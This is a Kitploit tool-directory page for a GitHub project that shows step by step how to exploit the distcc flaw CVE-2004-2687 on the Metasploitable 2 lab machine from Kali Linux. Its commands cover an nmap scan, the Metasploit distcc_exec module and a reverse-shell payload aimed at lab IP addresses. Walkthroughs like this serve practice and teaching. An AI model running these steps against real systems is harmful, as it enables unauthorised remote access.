Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/nulltrace1336/metasploitable-2-distcc-exploit-via-kali-linux-cve-2004-2687
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRemote Access ToolLabs & Practice
GitHubnulltrace1336/metasploitable-2-distcc-exploit-via-kali-linux-cve-2004-2687

Metasploitable-2-Distcc-Exploit-via-Kali-Linux-CVE-2004-2687

Ushbu videoda Metasploitable 2 tizimidagi distccd servisidagi zaiflikdan foydalanib, Kali Linux orqali remote shell olish ko‘rsatib beriladi.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
8 months agoNot yet reviewed

🎬 This YouTube video

YouTube Video

1️⃣ Target identification (Nmap)

root@kitploit:~
nmap -sV -p 3632 192.168.56.102

✅ Result will be like this: 3632/tcp open distccd v1

👉 So distcc is open and exploitable.

2️⃣ Launch Metasploit

root@kitploit:~
msfconsole

3️⃣ Select the Distcc exploit

root@kitploit:~
use exploit/unix/misc/distcc_exec

4️⃣ Check settings

root@kitploit:~
show options

Required parameters:

Option Value RHOSTS Metasploitable IP RPORT 3632 PAYLOAD cmd/unix/reverse

5️⃣ Set target IP

root@kitploit:~
set RHOSTS 192.168.56.102

6️⃣ Configure payload

root@kitploit:~
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101

LHOST — your Kali Linux IP address

7️⃣ Run the exploit

root@kitploit:~
run

🎉 Result

If successful:

[*] Command shell session opened

Check the shell:

root@kitploit:~
whoami
uname -a
id
Download Tool